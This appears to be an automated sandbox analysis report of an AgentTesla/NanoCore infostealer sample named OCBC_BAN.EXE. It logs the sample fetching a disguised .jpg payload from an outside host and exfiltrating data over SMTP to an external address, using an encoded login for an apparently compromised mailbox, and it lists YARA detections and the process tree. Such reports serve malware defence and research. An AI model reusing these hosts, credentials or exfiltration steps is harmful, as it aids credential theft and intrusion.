                        May 10, 2022 14:47:12.606168985 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.606194019 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.606235027 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.606237888 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.606273890 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.606309891 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.606317043 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.606348038 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.606378078 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.606399059 CEST4973780192.168.2.6103.8.79.204
                        May 10, 2022 14:47:12.606405020 CEST8049737103.8.79.204192.168.2.6
                        May 10, 2022 14:47:12.606431961 CEST8049737103.8.79.204192.168.2.6
                        TimestampSource PortDest PortSource IPDest IP
                        May 10, 2022 14:47:11.856347084 CEST6035053192.168.2.68.8.8.8
                        May 10, 2022 14:47:11.875746965 CEST53603508.8.8.8192.168.2.6
                        May 10, 2022 14:48:13.015645981 CEST5166653192.168.2.68.8.8.8
                        May 10, 2022 14:48:13.511332989 CEST53516668.8.8.8192.168.2.6
                        May 10, 2022 14:48:13.587321043 CEST5703753192.168.2.68.8.8.8
                        May 10, 2022 14:48:13.845794916 CEST53570378.8.8.8192.168.2.6
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        May 10, 2022 14:47:11.856347084 CEST192.168.2.68.8.8.80x1787Standard query (0)bmn.lpmpbanten.idA (IP address)IN (0x0001)
                        May 10, 2022 14:48:13.015645981 CEST192.168.2.68.8.8.80xa0a1Standard query (0)mail.elparque.com.uyA (IP address)IN (0x0001)
                        May 10, 2022 14:48:13.587321043 CEST192.168.2.68.8.8.80x5ac0Standard query (0)mail.elparque.com.uyA (IP address)IN (0x0001)
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        May 10, 2022 14:47:11.875746965 CEST8.8.8.8192.168.2.60x1787No error (0)bmn.lpmpbanten.id103.8.79.204A (IP address)IN (0x0001)
                        May 10, 2022 14:48:13.511332989 CEST8.8.8.8192.168.2.60xa0a1No error (0)mail.elparque.com.uymx.mf.netgate.com.uyCNAME (Canonical name)IN (0x0001)
                        May 10, 2022 14:48:13.511332989 CEST8.8.8.8192.168.2.60xa0a1No error (0)mx.mf.netgate.com.uy200.40.119.50A (IP address)IN (0x0001)
                        May 10, 2022 14:48:13.845794916 CEST8.8.8.8192.168.2.60x5ac0No error (0)mail.elparque.com.uymx.mf.netgate.com.uyCNAME (Canonical name)IN (0x0001)
                        May 10, 2022 14:48:13.845794916 CEST8.8.8.8192.168.2.60x5ac0No error (0)mx.mf.netgate.com.uy200.40.119.50A (IP address)IN (0x0001)
                        • bmn.lpmpbanten.id
                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.649737103.8.79.20480C:\Users\user\Desktop\OCBC_BAN.EXE
                        TimestampkBytes transferredDirectionData
                        May 10, 2022 14:47:12.076750040 CEST222OUTGET /fint/Waxhxbwa_Ytgbplyy.jpg HTTP/1.1
                        Host: bmn.lpmpbanten.id
                        Connection: Keep-Alive
                        May 10, 2022 14:47:12.252577066 CEST224INHTTP/1.1 200 OK
                        Server: nginx
                        Date: Tue, 10 May 2022 12:47:12 GMT
                        Content-Type: image/jpeg
                        Content-Length: 1460224
                        Connection: keep-alive
                        Last-Modified: Tue, 10 May 2022 02:01:19 GMT
                        Expires: Sat, 09 Jul 2022 12:47:12 GMT
                        Cache-Control: max-age=5184000
                        X-XSS-Protection: 1; mode=block
                        X-Content-Type-Options: nosniff
                        X-Nginx-Upstream-Cache-Status: STALE
                        X-Server-Powered-By: Engintron
                        Accept-Ranges: bytes
                        Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 30 00 00 00 0c 00 16 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 35 00 38 00 39 00 38 00 2e 00 35 00 36 00 31 00 38 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 20 00 79 00 6c 00 62 00 6d 00 65 00 73 00 73 00 41 00 01 00 0e 00 44 00 00 00 35 00 38 00 39 00 38 00 2e 00 35 00 36 00 31 00 38 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 0e 00 40 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 01 00 22 00 00 00 6c 00 6c 00 64 00 2e 00 69 00 66 00 64 00 76 00 67 00 6d 00 77 00 68 00 69 00 61 00 65 00 76 00 62 00 6d 00 75 00 70 00 75 00 73 00 43 00 00 00 65 00 6d 00 61 00 6e 00 65 00 6c 00 69 00 46 00 6c 00 61 00 6e 00 69 00 67 00 69 00 72 00 4f 00 01 00 18 00 58 00 00 00 00 00 00 00 00 00 73 00 6b 00 72 00 61 00 6d 00 65
                        Data Ascii: >0P5898.5618.0.1noisreV ylbmessAD5898.5618.0.1noisreVtcudorP@emaNtcudorP"lld.ifdvgmwhiaevbmupusCemaneliFlanigirOXskrame


                        TimestampSource PortDest PortSource IPDest IPCommands
                        May 10, 2022 14:48:15.159502029 CEST58749786200.40.119.50192.168.2.6220 correo.netgate.com.uy ESMTP NETGATE_S.A
                        May 10, 2022 14:48:15.159888029 CEST49786587192.168.2.6200.40.119.50EHLO 980108
                        May 10, 2022 14:48:15.415002108 CEST58749786200.40.119.50192.168.2.6250-correo.netgate.com.uy
                        250-PIPELINING
                        250-SIZE 52428800
                        250-ETRN
                        250-STARTTLS
                        250-AUTH PLAIN LOGIN
                        250-AUTH=PLAIN LOGIN
                        250-ENHANCEDSTATUSCODES
                        250-8BITMIME
                        250 DSN
                        May 10, 2022 14:48:15.416372061 CEST49786587192.168.2.6200.40.119.50AUTH login aW5mb0BlbHBhcnF1ZS5jb20udXk=
                        May 10, 2022 14:48:15.672071934 CEST58749786200.40.119.50192.168.2.6334 UGFzc3dvcmQ6
                        May 10, 2022 14:48:15.929456949 CEST58749786200.40.119.50192.168.2.6235 2.7.0 Authentication successful
                        May 10, 2022 14:48:15.933407068 CEST49786587192.168.2.6200.40.119.50MAIL FROM:<info@elparque.com.uy>
                        May 10, 2022 14:48:16.188899994 CEST58749786200.40.119.50192.168.2.6250 2.1.0 Ok
                        May 10, 2022 14:48:16.192569017 CEST49786587192.168.2.6200.40.119.50RCPT TO:<contacto@filtrosdys.com>
                        May 10, 2022 14:48:16.559595108 CEST58749786200.40.119.50192.168.2.6250 2.1.5 Ok
                        May 10, 2022 14:48:16.559954882 CEST49786587192.168.2.6200.40.119.50DATA
                        May 10, 2022 14:48:16.814980984 CEST58749786200.40.119.50192.168.2.6354 End data with <CR><LF>.<CR><LF>
                        May 10, 2022 14:48:16.818661928 CEST49786587192.168.2.6200.40.119.50.
                        May 10, 2022 14:48:17.094567060 CEST58749786200.40.119.50192.168.2.6250 2.0.0 Ok: queued as 68DC22A598C
                        May 10, 2022 14:49:17.154443026 CEST58749786200.40.119.50192.168.2.6421 4.4.2 correo.netgate.com.uy Error: timeout exceeded

                        Click to jump to process

                        Target ID:0
                        Start time:14:47:09
                        Start date:10/05/2022
                        Path:C:\Users\user\Desktop\OCBC_BAN.EXE
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\OCBC_BAN.EXE"
                        Imagebase:0x820000
                        File size:25088 bytes
                        MD5 hash:BE7BB1D25F6FB1B424AB8B54DC3971D0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000003.497174960.000000000A803000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000003.497174960.000000000A803000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000003.497125933.000000000A7AC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000003.497125933.000000000A7AC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.536754919.0000000003B99000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.536754919.0000000003B99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.536754919.0000000003B99000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.536084808.0000000002C9D000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.536084808.0000000002C9D000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.536198846.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.536198846.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        Reputation:low

                        Target ID:5
                        Start time:14:47:41
                        Start date:10/05/2022
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\cmd.exe" /c timeout 10
                        Imagebase:0xed0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:6
                        Start time:14:47:41
                        Start date:10/05/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6406f0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:7
                        Start time:14:47:41
                        Start date:10/05/2022
                        Path:C:\Windows\SysWOW64\timeout.exe
                        Wow64 process (32bit):true
                        Commandline:timeout 10
                        Imagebase:0xea0000
                        File size:26112 bytes
                        MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:9
                        Start time:14:47:53
                        Start date:10/05/2022
                        Path:C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe"
                        Imagebase:0xe30000
                        File size:213504 bytes
                        MD5 hash:4AD411F172F9362BB859CD369E5F3F8E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.465813754.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.465813754.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.466270917.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.466270917.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.632461806.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.632461806.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.462652730.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.462652730.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.465157783.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.465157783.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe, Author: Joe Security
                        • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe, Author: ditekSHen
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 37%, Metadefender, Browse
                        • Detection: 85%, ReversingLabs
                        Reputation:low

                        Target ID:12
                        Start time:14:48:24
                        Start date:10/05/2022
                        Path:C:\Users\user\Desktop\OCBC_BAN.EXE
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\Desktop\OCBC_BAN.EXE
                        Imagebase:0x630000
                        File size:25088 bytes
                        MD5 hash:BE7BB1D25F6FB1B424AB8B54DC3971D0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.637242495.0000000005300000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.637242495.0000000005300000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                        • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000C.00000002.637242495.0000000005300000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000000.528619863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000000.528619863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 0000000C.00000000.528619863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.632460543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.632460543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.632460543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000000.530203909.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000000.530203909.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 0000000C.00000000.530203909.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000000.529485631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000000.529485631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 0000000C.00000000.529485631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        Reputation:low

                        No disassembly